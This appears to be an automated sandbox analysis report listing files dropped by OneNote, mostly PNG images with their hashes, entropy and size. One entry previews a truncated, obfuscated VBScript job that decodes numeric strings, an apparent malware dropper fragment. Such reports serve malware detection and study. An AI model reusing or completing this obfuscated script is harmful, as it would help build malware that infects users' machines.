                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):19235
                                                                                                                                                                                                          Entropy (8bit):7.944867159042578
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                          MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                          SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                          SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                          SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):14458
                                                                                                                                                                                                          Entropy (8bit):7.944094738048628
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                          MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                          SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                          SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                          SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3879
                                                                                                                                                                                                          Entropy (8bit):7.9281351307465044
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                                                                                                                          MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                                                                                                                          SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                                                                                                                          SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                                                                                                                          SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):55113
                                                                                                                                                                                                          Entropy (8bit):5.216959514455489
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                                                                                                                          MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                                                                                                                          SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                                                                                                                          SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                                                                                                                          SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7374
                                                                                                                                                                                                          Entropy (8bit):7.955141875077912
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                          MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                          SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                          SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                          SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
